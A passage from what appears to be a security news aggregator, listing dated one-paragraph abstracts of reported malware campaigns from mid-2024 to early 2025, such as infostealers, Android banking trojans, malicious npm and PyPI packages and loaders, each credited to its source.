Following its removal from the Chrome Web Store due to the use of Manifest v2, the legitimate extension was replaced by a malicious one called 'EditThisCookie®', using Manifest v3. Security Online
January 4, 2025
New Stealthy Malware Leveraging SSH Over TOR Attacking Ukrainian Military Full Text
Abstract
Researchers recently discovered a malicious campaign targeting Ukrainian military personnel through fake “Army+” app websites, which host a malicious installer that, upon execution, extracts the legitimate app alongside the Tor browser. GBHackers
January 3, 2025
New FireScam Information Stealer Comes with Spyware Capabilities Full Text
Abstract
FireScam monitors device activities such as screen state changes, e-commerce transactions, clipboard activity, and user engagement to gather valuable information covertly. Cyfirma
January 2, 2025
Advancing Through the Cyberfront, LegionLoader Commander Full Text
Abstract
LegionLoader is a downloader malware written in C/C++ that first appeared in the wild in 2019. It is also known by other names, including Satacom and RobotDropper, and is tracked as CurlyGate by Mandiant. TRAC Labs
January 2, 2025
Malicious Obfuscated NPM Package Disguised as an Ethereum Tool Deploys Quasar RAT Full Text
Abstract
The heavily obfuscated package, named ethereumvulncontracthandler, was published to npm on December 18, 2024, by a user named "solidit-dev-416." As of writing, it continues to be available for download. It has been downloaded 66 times to date. The Hacker News
January 2, 2025
New NGate Trojan Drains Bank Accounts via NFC-based ATM Withdrawals Full Text
Abstract
The NGate trojan relays data from the compromised device's NFC chip, allowing the attacker to withdraw money from the victim's accounts at ATMs without the victim’s involvement. Security Online
December 27, 2024
New ‘OtterCookie’ Malware Used to Backdoor Developers in Fake Job Offers Full Text
Abstract
A report from NTT Security Japan found that the Contagious Interview operation is now using a new piece of malware called OtterCookie, which was likely introduced in September, with a new variant appearing in the wild in November. Cyware
December 27, 2024
AI Could Generate 10,000 Malware Variants, Evading Detection in 88% of Cases Full Text
Abstract
Unit 42 used LLMs to rewrite malware samples, bypassing detection by ML models like Innocent Until Proven Guilty (IUPG) and PhishingJS, creating 10,000 functional JavaScript variants without altering the functionality. Cyware
December 24, 2024
Malicious Intent Discovered in Two PyPI Packages Full Text
Abstract
Fortinet flagged two malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, exhibiting behaviors like keylogging, data exfiltration, webhook injection, and anti-VM checks while employing obfuscation to evade detection. Fortinet
December 21, 2024
Malicious Microsoft VSCode Extensions Target Developers, Crypto Community Full Text
Abstract
Malicious Visual Studio Code extensions were discovered on the VSCode marketplace that download heavily obfuscated PowerShell payloads to target developers and cryptocurrency projects in supply chain attacks. Bleeping Computer
December 18, 2024
CoinLurker Stealer Infects Users Through Fake Software Update Prompts Full Text
Abstract
"Written in Go, CoinLurker employs cutting-edge obfuscation and anti-analysis techniques, making it a highly effective tool in modern cyber attacks," Morphisec researcher Nadav Lorber said in a technical report published Monday. Morphisec
December 18, 2024
Technical Analysis of RiseLoader Reveals Similarities with RisePro’s Communication Protocol Full Text
Abstract
RiseLoader is a new malware loader family that was first observed in October 2024. The malware implements a custom TCP-based binary network protocol that is similar to RisePro. Zscaler
December 18, 2024
Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels Full Text
Abstract
The malware, disguised as legitimate documents like contracts or promotional materials, is often delivered through password-protected files hosted on platforms such as OneDrive to evade detection. CloudDesk
December 18, 2024
New Android NoviSpy Spyware Linked to Qualcomm Zero-Day Bugs Full Text
Abstract
One of the Qualcomm flaws linked to the attacks is CVE-2024-43047, which was marked as an actively exploited zero-day vulnerability by Google Project Zero in October 2024 and received a fix on Android in November. Bleeping Computer
December 14, 2024
New Linux Rootkit PUMAKIT Uses Advanced Stealth Techniques to Evade Detection Full Text
Abstract
Cybersecurity researchers have uncovered a new Linux rootkit called PUMAKIT that comes with capabilities to escalate privileges, hide files and directories, and conceal itself from system tools, while simultaneously evading detection. The Hacker News
December 14, 2024
New IOCONTROL malware used in critical infrastructure attacks Full Text
Abstract
The malware's modular nature makes it capable of compromising a broad spectrum of devices from various manufacturers, including D-Link, Hikvision, Baicells, Red Lion, Orpak, Phoenix Contact, Teltonika, and Unitronics. Bleeping Computer
December 11, 2024
MoqHao Leverages iCloud and VK in Campaign Targeting Apple IDs and Android Devices Full Text
Abstract
MoqHao, also known as Wroba and XLoader, is a mobile malware family linked to Roaming Mantis, a cybercrime group believed to be operating out of China. Malicious payloads are usually delivered through SMS phishing attacks targeting mobile devices. Hunt
December 7, 2024
MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks Full Text
Abstract
Earth Minotaur uses the MOONSHINE exploit kit to deliver the DarkNimbus backdoor to Android and Windows devices, targeting WeChat, and possibly making it a cross-platform threat. Trend Micro
December 7, 2024
Crypto-Stealing Malware Posing as a Meeting App Targets Web3 Professionals Full Text
Abstract
Cybercriminals are targeting people working in Web3 with fake business meetings using a fraudulent video conferencing platform that infects Windows and Macs with crypto-stealing malware. Bleeping Computer
December 5, 2024
Beware of Celestial Stealer: New MaaS Targets Browsers and Crypto Wallets Full Text
Abstract
Celestial Stealer operates as a MaaS offering marketed on Telegram, with subscription plans available on a weekly, monthly, or lifetime basis. It is primarily designed for Windows 10 and 11. Security Online
December 5, 2024
New Andromeda/Gamarue Command-and-Control Cluster Targets APAC Industries Full Text
Abstract
In a recent report, the Cybereason Security Services Team unveiled the discovery of a new cluster of Command-and-Control (C2) servers linked to the infamous Andromeda (aka Gamarue) malware family. Security Online
December 4, 2024
ElizaRAT: Enhancing C2 Communication Through Google, Telegram, & Slack Services Full Text
Abstract
Once executed, the malware extracts sensitive information from Userinfo.dll and transmits it to a remote server, which periodically checks for new instructions, enabling remote control over the compromised system. GBHackers
December 3, 2024
Gafgyt Malware Broadens its Scope in Recent Attacks Full Text
Abstract
Gafgyt primarily targets vulnerable IoT devices, but Trend Micro researchers recently observed this malware being used to attack Docker Remote API servers, signifying a notable shift in its behavior. Trend Micro
December 3, 2024
New Malware Families RevC2 and Venom Loader Spread via MaaS Tools Full Text
Abstract
“RevC2 uses WebSockets to communicate with its command-and-control (C2) server. The malware is capable of stealing cookies and passwords, proxies network traffic, and enables remote code execution (RCE),” noted ThreatLabz. Zscaler
December 2, 2024
Fake Betting Apps Using AI-Generated Voices to Steal Data Full Text
Abstract
Cybercriminals are creating fake betting app ads to lure users and steal money and personal information. Over 500 fake ads and 1,377 malicious sites have been identified, targeting users in regions like Egypt, the Middle East, Europe, and Asia. Hack Read
November 29, 2024
SMOKEDHAM Backdoor: UNC2465’s Stealth Weapon for Extortion and Ransomware Campaigns Full Text
Abstract
Once embedded, SMOKEDHAM grants attackers initial access to a target’s system, paving the way for network reconnaissance, lateral movement, and, eventually, ransomware deployment. Security Online
November 28, 2024
What’s up India? PixPirate is back and spreading via WhatsApp Full Text
Abstract
A new iteration of the PixPirate malware has been detected, marking the resurgence of a highly sophisticated threat. The malware is known for targeting financial services and now leverages WhatsApp as a primary vector for its propagation. Security Intelligence
November 23, 2024
Faux ChatGPT, Claude API Packages Deliver JarkaStealer Full Text
Abstract
Two Python packages posing as tools to integrate with popular chatbots and provide API access are actually delivering "JarkaStealer," an infostealer designed to target potentially thousands of victims. Dark Reading
November 23, 2024
Hackers Use Telegram Channels To Deliver Lumma Stealer Sophisticatedly Full Text
Abstract
Lumma Stealer, a sophisticated information-stealing malware, is spreading through Telegram channels, exploiting the platform’s popularity to bypass traditional security measures and target unsuspecting users, potentially compromising sensitive data. GBHackers
November 22, 2024
Unraveling Raspberry Robin’s Layers: Analyzing Obfuscation Techniques and Core Mechanisms Full Text
Abstract
Raspberry Robin, a stealthy malware discovered in 2021, leverages advanced obfuscation techniques to evade detection and analysis. It infiltrates systems primarily via USB drives and uses the Tor network for covert communication with its C2 servers. Zscaler
November 21, 2024
Unveiling WolfsBane: Gelsemium’s Linux counterpart to Gelsevirine Full Text
Abstract
The first backdoor, WolfsBane, is a Linux version of Gelsevirine, a Windows backdoor used by Gelsemium, and the WolfsBane dropper is analogous to the Gelsemine dropper. WeLiveSecurity
November 19, 2024
FrostyGoop’s Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications Full Text
Abstract
FrostyGoop is the ninth reported OT-centric malware, but the first that used Modbus TCP communications to impact the power supply to heating services for over 600 apartment buildings. Palo Alto Networks
November 16, 2024
New Glove Stealer Malware Bypasses Chrome’s Cookie Encryption Full Text
Abstract
The new malware named Glove Stealer can get around Google Chrome's App-Bound encryption to steal browser cookies. Security researchers found this malware during a phishing campaign and noted that it is still in the early stages of development. Bleeping Computer
November 13, 2024
‘GoIssue’ Cybercrime Tool Targets GitHub Developers for Bulk Credential Theft Full Text
Abstract
A cybercrime tool called GoIssue is being sold for $700 on a forum. It helps cyberattackers steal email addresses from GitHub profiles to use for further attacks like malware delivery and data breaches. Dark Reading
November 13, 2024
Unmasking the SEO Poisoning and Malware Networks Behind Fake E-Commerce Sites Full Text
Abstract
A study by Trend Micro, Japanese authorities, and universities exposed a network of SEO malware families behind fake e-commerce scams targeting Japanese users. Nearly 50,000 fake e-commerce sites were reported in 2023. Security Online
November 12, 2024
New Node.js-based Wish Stealer Targets Discord, Browsers, and Cryptocurrency Wallets Full Text
Abstract
CYFIRMA recently discovered a new malware called “Wish Stealer” that targets Windows users by stealing sensitive information from various sources like Discord, web browsers, cryptocurrency wallets, and social media accounts. Cyfirma
November 12, 2024
Evasive ZIP File Concatenation Used to Deploy Trojan Targeting Windows Users Full Text
Abstract
According to Perception Point, hackers are increasingly using a technique called ZIP file concatenation to hide malicious payloads in compressed archives in a way that security solutions might miss. Perception Point
November 12, 2024
Industrial Companies in Europe Targeted with GuLoader Full Text
Abstract
The malware employs memory injection techniques to execute malicious payloads without writing files to the disk, evading antivirus software. It includes anti-debugging tools to hinder analysis and injects shellcode into legitimate Windows processes. Help Net Security
November 9, 2024
GodFather Malware Now Targets More Than 500 Banking and Crypto Apps Full Text
Abstract
The GodFather malware has now expanded to target over 500 banking and cryptocurrency applications globally, using sophisticated tactics like phishing sites and native code implementation to evade detection. Security Online
November 7, 2024
Recent Keylogger Malware Attributed to North Korean Group Andariel Full Text
Abstract
Known for targeted cyber espionage, Andariel has utilized this keylogger in attacks on U.S. organizations to gather sensitive information through keystroke and mouse logging. Hybrid Analysis
November 6, 2024
GOOTLOADER Malware Continues to Evolve: Google Researchers Uncover Advanced Tactics Full Text
Abstract
Google researchers recently analyzed GOOTLOADER, a JavaScript downloader used by cybercriminals for ransomware attacks and data exfiltration. This malware is distributed through compromised websites, targeting victims via SEO poisoning. Security Online
November 5, 2024
Custom “Pygmy Goat” Malware Used in Sophos Firewall Hack on Government Network Full Text
Abstract
The UK's National Cyber Security Centre (NCSC) has analyzed a Linux malware called "Pygmy Goat" that was developed to create backdoors in Sophos XG firewall devices as part of recent attacks by Chinese threat actors. Bleeping Computer
November 5, 2024
HookBot Uses Advanced Techniques Beyond Keylogging for Data Theft Full Text
Abstract
Netcraft's recent study highlighted HookBot, an advanced Android banking trojan discovered in 2023, that uses overlay attacks, keylogging, and SMS interception to steal sensitive information like banking credentials and passwords. Security Online
November 5, 2024
Beware of chalk-node: Malicious Package Steals Developer Data Full Text
Abstract
A malicious package called “chalk-node” is pretending to be the legitimate “chalk” library. This imposter package contains a script that steals sensitive data from victims' computers and sends it to external servers. Security Online
November 4, 2024
New LightSpy Spyware Version Targets iPhones with Increased Surveillance Tactics Full Text
Abstract
Cybersecurity researchers have identified an enhanced version of an Apple iOS spyware known as LightSpy, which not only improves its functionalities but also adds destructive capabilities to prevent a compromised device from booting up. Cyware
November 1, 2024
Malvertising Campaign Hijacks Facebook Accounts to Spread SYS01stealer Malware Full Text
Abstract
The malware is distributed through malvertising on platforms like Facebook, YouTube, and LinkedIn, targeting men aged 45 and above with enticing ads to steal browser data. Victims are lured to deceptive sites impersonating legitimate brands. The Hacker News
November 1, 2024
Android Malware FakeCall Now Reroutes Bank Calls to Attackers Full Text
Abstract
Beyond voice phishing, FakeCall can capture live audio and video streams from compromised devices without user interaction. The new variant manipulates outgoing calls by setting itself as the default call handler, intercepting and redirecting calls. Bleeping Computer
October 23, 2024
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA Full Text
Abstract
The malware's execution relies on legitimate tools like PowerShell and mshta.exe. Once the fake CAPTCHA is clicked, a Base64-encoded PowerShell script is copied to the clipboard, triggering the download of a stager file. Qualys
October 23, 2024
Early Cascade Injection Technique Enables Windows Process Creation and Stealthy Injection Full Text
Abstract
Researcher Guido Miggelenbrink from Outflank has introduced a new process injection method called Early Cascade Injection. This technique adds sophistication to evading Endpoint Detection and Response (EDR) systems, challenging even top-tier EDRs. Outflank
October 23, 2024
VOIDMAW: A New Bypass Technique for Memory Scanners Full Text
Abstract
VOIDMAW is an innovative memory scanning bypass technique utilized by attackers to evade antivirus software. It can run non-.NET executables and supports multithreaded payloads, making it a potent tool for attackers. Security Online
October 23, 2024
Fake WordPress Plugins on 6,000 Sites Prompt Users to Install Malware Full Text
Abstract
The malware campaign is based on ClickFix fake browser update malware and has infected over 6,000 sites since June 2024, totaling over 25,000 sites since August 2023. The hackers are using stolen credentials to install the bogus plugins. The Cyber Express
October 23, 2024
Researchers Report Possible Bumblebee Loader Resurgence Full Text
Abstract
The Bumblebee loader resurfaced following the disruption of Operation Endgame in May 2024. Netskope Threat Labs identified a new infection chain employing Bumblebee malware, marking its return since the operation that targeted major malware botnets. Infosecurity Magazine
October 22, 2024
GHOSTPULSE Employs New Pixel-Level Deception to Hide in PNG Files Full Text
Abstract
Elastic Security Labs has discovered a significant development in the GHOSTPULSE malware family, which now hides its payload within the pixel structure of PNG files to evade detection. Cyware
October 16, 2024
Hijack Loader Found Abusing Genuine Code-Signing Certificates Full Text
Abstract
Cybersecurity researchers have unveiled a new malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates. HarfangLab detected the attack chains aiming to deploy Lumma, an information stealer. HarfangLab
October 16, 2024
New Linux Variant of FASTCash Malware Helps Steal Money From ATMs Full Text
Abstract
The new Linux variant was submitted to VirusTotal in June 2023 and can evade standard security tools, enabling the hackers to conduct transactions without detection. Additionally, a new Windows version was submitted in September 2024. Bleeping Computer
October 16, 2024
ErrorFather Campaign Deploys Cerberus Android Banking Trojan to Amplify Cyber Threats Full Text
Abstract
This malware communicates with a Telegram bot and conducts financial fraud through remote attacks, keylogging, and overlay attacks. Despite modifications, ErrorFather is still based on the original Cerberus code. Cyble
October 14, 2024
Technical Analysis of DarkVision RAT Full Text
Abstract
Zscaler ThreatLabz observed DarkVision RAT in a new campaign in July 2024. The attack chain involves shellcode decryption, a Donut loader, and a .NET assembly called PureCrypter. Zscaler
October 12, 2024
Malware by the (Bit)Bucket: Uncovering AsyncRAT Full Text
Abstract
G DATA Security Lab discovered a malware campaign using Bitbucket to deploy AsyncRAT, a remote access trojan. The attackers employed multi-stage attacks to host and distribute malicious payloads, hiding their activities with Base64 encoding. G DATA
October 11, 2024
Trojan.AutoIt.1443 Hits 28,000 Users via Game Cheats, Office Tool Full Text
Abstract
The malware executes tasks to establish network access with Ncat, manipulates the system registry using IFEO, and controls system functions. It conducts cryptomining using SilentCryptoMiner and steals funds by swapping crypto wallet addresses. HackRead
October 10, 2024
Lua Malware Targeting Student Gamers via Fake Game Cheats Full Text
Abstract
Morphisec Threat Labs has found advanced Lua malware targeting student gamers and educational institutions, taking advantage of Lua-based gaming engine supplements popular among students. HackRead
October 8, 2024
LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits Full Text
Abstract
A recent report by security researchers at Aufa and NetbyteSEC reveals the resurgence of the LemonDuck malware, exploiting the EternalBlue vulnerability in Microsoft’s SMB protocol for cryptomining. Net Bytes
October 8, 2024
Threat Actor Believed to be Spreading New Medusalocker Variant Since 2022 Full Text
Abstract
BabyLockerKZ has expanded its reach to different continents, shifting from Europe to South America in early 2023. It has distinct features compared to MedusaLocker, such as unique storage keys and differences between Windows and Linux versions. Talos Intelligence
October 7, 2024
Fake Job Applications Deliver Dangerous More_eggs Malware to HR Professionals Full Text
Abstract
This malware, which can steal credentials from online bank accounts, email accounts, and IT administrator accounts, is attributed to a threat actor group known as Golden Chickens. The Hacker News
October 7, 2024
Python-based Malware Slithers Into Systems via Legit VS Code Full Text
Abstract
Researchers from Cyble Research and Intelligence Lab (CRIL) uncovered the attack, which begins with a malicious email and utilizes Visual Studio Code to distribute Python-based malware, granting unauthorized remote access to infected devices. Dark Reading
October 5, 2024
Fake Trading Apps Target Victims Globally via Apple App Store and Google Play Full Text
Abstract
These apps are part of a consumer investment fraud scheme known as pig butchering, where victims are tricked into investing in cryptocurrency or other financial instruments under false pretenses. The Hacker News
October 3, 2024
PyPI Repository Found Hosting Fake Crypto Wallet Recovery Tools That Steal User Data Full Text
Abstract
The Python Package Index (PyPI) repository was found hosting fake cryptocurrency wallet recovery tools that steal user data, targeting popular wallets like Atomic and Trust Wallet. The Hacker News
September 20, 2024
Hackers Deliver Popular Crypto-Miner Through Malicious Email Auto Replies, Researchers Say Full Text
Abstract
Hackers are distributing a popular crypto-miner via malicious email auto-replies, as per researchers. They compromised email accounts to send innocent automatic replies with links to crypto-mining malware, specifically XMRig. The Record
September 17, 2024
EchoStrike: Generate Undetectable Reverse Shells, Perform Process Injection Full Text
Abstract
EchoStrike features an interactive Python wizard for easy customization, various persistence techniques, binary padding for evasion, AES payload encryption, and dynamic binary download. Help Net Security
September 14, 2024
TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud Full Text
Abstract
Cybersecurity researchers at Cleafy discovered a new variant of the TrickMo Android banking trojan that evades analysis and displays fake login screens to steal banking credentials. The Hacker News
September 14, 2024
New Android Malware Ajina.Banker Steals 2FA Codes, Spreads via Telegram Full Text
Abstract
Discovering the threat in May 2024, Group-IB highlighted that the malware is spread through Telegram channels disguised as legitimate banking and government service applications. HackRead
September 14, 2024
New Vo1d Malware Infects 1.3 Million Android Streaming Boxes Full Text
Abstract
The Vo1d malware campaign targets specific Android firmware versions like Android 7.1.2 and Android 10.1. The malware modifies system files to launch itself on boot and persist on the device. Bleeping Computer
September 10, 2024
Predator Spyware Roars Back with New Infrastructure, Evasive Tactics Full Text
Abstract
Researchers have warned of the resurgence of Predator spyware, previously thought to be inactive due to sanctions and exposure, thanks to new infrastructure and evasive tactics. Security Online
September 10, 2024
Spyware Vendors’ Nebulous Ecosystem Helps Them Evade Sanctions Full Text
Abstract
Spyware vendors have developed a complex ecosystem that enables them to evade sanctions effectively by utilizing a network of interconnected entities across various jurisdictions. Infosecurity Magazine
September 4, 2024
Earth Lusca Uses KTLVdoor Backdoor for Multiplatform Intrusion Full Text
Abstract
The highly obfuscated KTLVdoor malware has versions for both Microsoft Windows and Linux, allowing attackers to perform tasks like file manipulation, command execution, and remote port scanning. Trend Micro
September 4, 2024
Emansrepo Stealer: Multi-Vector Attack Chains Full Text
Abstract
The Python-based infostealer collects user information, text files, PDF files, browser data, crypto wallets, game platforms, browser extensions, and cookies. The stolen data is sent via email to the attacker. Fortinet
August 31, 2024
Rocinante: The Trojan Horse That Wanted to Fly Full Text
Abstract
Once installed, the Rocinante malware prompts the victim to grant Accessibility Services and displays phishing screens tailored to different banks to steal personal information. Threat Fabric
August 31, 2024
Godzilla Fileless Backdoors Targeting Atlassian Confluence Full Text
Abstract
The Godzilla fileless backdoor relies on a complex series of actions, such as cryptographic operations, class loading, and dynamic injection, to establish unauthorized access. Trend Micro
August 13, 2024
Threat Actors Hijacking Websites to Deliver .NET-Based Malware Full Text
Abstract
Cyber threat operation ClearFake distributes fake antivirus software to trick users into believing their systems are infected, leading to requests for payment or installation of more malware. Cybersecurity News
August 7, 2024
North Korean Hackers Leverage Malicious NPM Packages for Initial Access Full Text
Abstract
North Korean hackers, identified as Moonstone Sleet, have been distributing malicious JavaScript packages on the npm registry to infect Windows systems. The two packages, harthat-api and harthat-hash, were uploaded on July 7, 2024. DataDog
August 7, 2024
Chameleon Malware Now Targeting Employees Masquerading as a CRM app Full Text
Abstract
Researchers have revealed a new tactic used by threat actors behind the Chameleon Android banking trojan, targeting Canadian users with a disguised Customer Relationship Management (CRM) app. Threat Fabric
August 6, 2024
Sneaky SnakeKeylogger Slithers Into Windows Email Inboxes Full Text
Abstract
SnakeKeylogger, also known as KrakenKeylogger, is a malicious software targeting Windows users. It logs keystrokes, steals credentials, and takes screenshots, allowing cybercriminals to capture sensitive information. The Register
August 6, 2024
Mint Stealer: New MaaS Malware Threatens Confidential Data Full Text
Abstract
A new MaaS malware known as Mint Stealer has emerged, threatening confidential data. This malware, identified by experts from Cyfirma, is designed to steal a wide range of information by employing advanced encryption and obfuscation techniques. Security Online
August 1, 2024
Telegram-Controlled TgRat Trojan Now Targets Linux Servers Full Text
Abstract
TgRat Trojan, previously targeting Windows, now focuses on Linux, using Telegram to control infected machines. Discovered by Dr. Web, this RAT allows cybercriminals to exfiltrate data and execute commands. Hack Read
July 31, 2024
New Specula Tool Uses Outlook for Remote Code Execution in Windows Full Text
Abstract
TrustedSec released a post-exploitation framework called "Specula", which exploits CVE-2017-11774 to create a custom Outlook Home Page using WebView and execute arbitrary commands on compromised Windows systems.Bleeping Computer
July 31, 2024
Mandrake Spyware Infects 32,000 Devices via Google Play Apps Full Text
Abstract
Initially detected in May 2020 by Bitdefender, Mandrake went undetected for four years. In April 2024, Kaspersky identified a new variant hidden in five Google Play apps from 2022 to 2024.Infosecurity Magazine
July 30, 2024
New PowerShell Backdoor Linked to Zloader Malware Full Text
Abstract
The newly discovered backdoor has limited samples available on VirusTotal, making detection more difficult. It operates by collecting system information and sending it to a command and control server, awaiting further instructions.Infosecurity Magazine
July 29, 2024
Gh0stGambit Dropper Used to Deploy Gh0st RAT Against Chinese Users Full Text
Abstract
The Gh0st RAT Trojan is being distributed to Chinese Windows users through a fake Chrome website. The malware has been around since 2008 and has evolved over the years, often used by cyberespionage groups in China.eSentire
July 29, 2024
Targeted PyPI Package Steals Google Cloud Credentials from macOS Devs Full Text
Abstract
The malware is designed to target only 64 specific machines, attempting to exfiltrate Google Cloud Platform credentials for potential follow-on attacks such as data theft and malware implantation.Dark Reading
July 17, 2024
Fake AWS Packages Ship Command and Control Malware in JPEG Files Full Text
Abstract
The two malicious packages, img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy, were downloaded 190 and 48 times, respectively, before being removed by npm security.Phylum
July 12, 2024
Exploring Compiled V8 JavaScript Usage in Malware Full Text
Abstract
Compiled V8 JavaScript in Google's engine converts JavaScript into low-level bytecode, making analysis and detection difficult. Attacks using this bytecode ensure compatibility with the V8 engine for successful execution.CheckPoint
July 10, 2024 – Phishing
Regional Transport Office Themed Phishing Campaign Targets Android Users In India Full Text
Abstract
Phishing messages impersonating the Regional Transport Office have been circulating since 2024, claiming traffic violations and prompting users to download a malicious APK named "VAHAN PARIVAHAN.apk".Cyble
As CISOs Grapple with the C-Suite, Job Satisfaction Takes a Hit Full Text
Abstract
Research shows that 75% of CISOs are considering a job change due to various challenges and pressures. CISOs often face accountability for cyber incidents and compliance failures, leading to discontent.Cybersecurity Dive
July 5, 2024
Turla: A Master of Deception Full Text
Abstract
The Turla malware has been found using weaponized LNK files to infect computers. The malware leverages a compromised website to distribute malicious packages through phishing emails.G Data
July 5, 2024
Malicious QR Reader App in Google Play Delivers Anatsa Banking Malware Full Text
Abstract
A malicious QR code reader app on Google Play has been found distributing the Anatsa banking malware, posing a significant threat to users' financial data. The app has already been downloaded thousands of times.Cyber Security News
July 4, 2024
Mekotio Banking Trojan Threatens Financial Systems in Latin America Full Text
Abstract
The Mekotio banking trojan is a highly sophisticated malware that targets Latin American countries, with a focus on stealing banking credentials. It spreads through phishing emails, tricking users into interacting with malicious links or attachments.Trend Micro
July 4, 2024
Infostealer malware logs used to identify child abuse website members Full Text
Abstract
Researchers at Recorded Future's Insikt Group analyzed infostealer malware logs captured between February 2021 and February 2024. They cross-referenced the credentials with 20 known CSAM domains, identifying 3,324 unique username-password pairs.Bleeping Computer
July 2, 2024
New Orcinius Trojan Uses VBA Stomping to Mask Infection Full Text
Abstract
This multi-stage trojan utilizes Dropbox and Google Docs to update and deliver payloads. It uses the VBA stomping technique, removing the VBA source code in a Microsoft Office document, leaving only compiled p-code.SonicWall
July 2, 2024
CapraRAT Spyware Variant Disguised as Popular Apps to Target Android Users Full Text
Abstract
The recent campaign shows updates to the group's techniques and social engineering tactics, as well as efforts to maximize the spyware's compatibility with older and modern versions of the Android operating system.Silicon Angle
June 29, 2024
MerkSpy: Exploiting CVE-2021-40444 to Infiltrate Systems Full Text
Abstract
MerkSpy is designed to covertly monitor user activities, capture sensitive information like keystrokes and Chrome login credentials, and exfiltrate the data to the attacker's server.Fortinet
June 28, 2024
New Unfurling Hemlock Threat Actor Floods Systems with Malware Full Text
Abstract
Unfurling Hemlock is using a new method, referred to as a "malware cluster bomb," which allows the threat actor to use one malware sample to spread additional malware on compromised machines.Bleeping Computer
June 27, 2024
Malicious NPM Package Targets AWS Users to Deploy Backdoor Full Text
Abstract
ReversingLabs researchers discovered a suspicious package on npm called legacyreact-aws-s3-typescript. They found that the package contained a post-install script that downloaded and executed a simple backdoor.ReversingLabs
June 26, 2024
New Medusa Malware Variants Target Android Users in Seven Countries Full Text
Abstract
The Medusa banking trojan (aka TangleBot) operates as a malware-as-a-service, providing keylogging, screen controls, and SMS manipulation. Note that this operation is different from the ransomware gang and the Mirai-based botnet with the same name.Bleeping Computer
June 25, 2024
Android RAT SpyMax Targets Telegram Users Full Text
Abstract
SpyMax does not require the targeted device to be rooted, making it easier for threat actors to cause damage. Once installed, SpyMax gathers personal information from the infected device without user consent and sends it to a remote threat actor.K7 Security
June 22, 2024
Rafel RAT, Android Malware from Espionage to Ransomware Operations Full Text
Abstract
Check Point Research has identified multiple threat actors using Rafel RAT, including an espionage group. The tool's features, such as remote access and surveillance, make it effective for covert operations and infiltrating high-value targets.Check Point
June 20, 2024
Experts Uncover New Evasive SquidLoader Malware Targeting Chinese Organizations Full Text
Abstract
SquidLoader is designed to deliver a second-stage payload, such as Cobalt Strike, and has been active since at least April 2024. The payload is delivered through executables with descriptive Chinese filenames and icons resembling Word documents.The Hacker News
June 20, 2024
New Rust-based Fickle Malware Uses PowerShell for UAC Bypass and Data Exfiltration Full Text
Abstract
Fickle Stealer is being distributed through various attack chains to gather sensitive data from compromised hosts. Four distribution methods have been identified, including VBA dropper, VBA downloader, link downloader, and executable downloader.The Hacker News
June 19, 2024
New Diamorphine Rootkit Variant Seen Undetected in the Wild Full Text
Abstract
Once loaded, the Diamorphine rootkit hides files and folders and allows the threat actor to perform certain operations such as hiding processes, elevating privileges, and interacting with the rootkit.Avast
June 13, 2024
Dissecting SSLoad Malware: A Comprehensive Technical Analysis Full Text
Abstract
SSLoad is a sophisticated malware used for infiltrating systems through phishing emails, gathering reconnaissance data, and transmitting it back to its operators while delivering various payloads.Intezer
June 12, 2024
WarmCookie Gives Cyberattackers New Backdoor for Initial Access Full Text
Abstract
Once downloaded, WarmCookie is loaded using PowerShell and subsequently provides functionality for monitoring victims and deploying more damaging payloads like ransomware.Dark Reading
June 11, 2024
Noodle RAT: Reviewing the New Backdoor Used by Chinese-Speaking Groups Full Text
Abstract
Noodle RAT is a backdoor used by Chinese-speaking groups for cybercrime and espionage. This malware, both its Windows and Linux versions, has existed since 2016 but was misidentified as variants of other malware.Trend Micro
June 11, 2024
Latest Variant of ValleyRAT Delivered via DLL Sideloading and Process Injection Full Text
Abstract
The downloader and loader utilized in the campaign employ various techniques, including anti-virus checks, DLL sideloading, and process injection. The configuration to communicate to the C2 server is identified by a specific marker.Zscaler
June 10, 2024
Malicious VSCode Extensions with Millions of Installs Discovered Full Text
Abstract
Researchers found that the malicious code went undetected by endpoint detection and response (EDR) tools, as VSCode is treated leniently due to its nature as a development and testing system.Bleeping Computer
June 6, 2024
Muhstik Malware Targets Message Queuing Services Applications Full Text
Abstract
A remote code execution vulnerability, CVE-2023-33246, was discovered for RocketMQ versions 5.1.0 and below, allowing attackers to execute commands within the system using the update configuration function.Aqua
June 6, 2024
CarnavalHeist Banking Trojan Targets Brazil with Overlay Attacks Full Text
Abstract
The malware primarily targets Brazilian users, as evidenced by the use of Portuguese throughout the infection chain and the C2 infrastructure exclusively using the BrazilSouth availability zone on Microsoft Azure.PC Risk
June 6, 2024
DarkCrystal RAT Delivered via Signal Messenger Full Text
Abstract
Cybersecurity experts have found that the Signal messenger app is being used to distribute DarkCrystal RAT. This malware is being targeted at high-profile individuals in Ukraine, including government officials and military personnel.Broadcom
June 4, 2024
Sophisticated RAT Targeting Gulp Projects on npm Full Text
Abstract
The NPM package masquerades as a logger for gulp and gulp plugins and has been downloaded 175 times. It contains two obfuscated files that work together to deploy the malicious payload.Phylum
June 4, 2024
New Android Trojan ‘Viper RAT’ Advertised on Dark Web Forums to Steal User Data Full Text
Abstract
The threat actor behind Viper RAT has established a dedicated website and a Telegram account for ordering, adding a level of credibility. The cost of this malicious tool is surprisingly low, suggesting malicious intent.The Cyber Express
June 3, 2024
Fake Bahrain Government Android App Steals Personal Data Used for Financial Fraud Full Text
Abstract
McAfee Mobile Research Team found an Android malware that pretends to be the official app of Bahrain and advertises that users can renew or apply for driver’s licenses, visas, and ID cards on mobile.McAfee
May 31, 2024
Pirated Microsoft Office Delivers Malware Cocktail on Systems Full Text
Abstract
Cybercriminals are distributing a malware cocktail through cracked versions of Microsoft Office promoted on torrent sites. The malware delivered to users includes RATs, cryptocurrency miners, malware downloaders, proxy tools, and anti-AV programs.Bleeping Computer
May 30, 2024
PyPI Crypto-Stealer Targets Windows Users, Revives Malware Campaign Full Text
Abstract
The package, which has been downloaded 264 times, is described as an "API Management tool written in Python" but contains code that downloads and installs trojanized Windows binaries capable of surveillance, achieving persistence, and crypto-theft.Sonatype
May 29, 2024
New ATM Malware Family Emerged in the Threat Landscape Full Text
Abstract
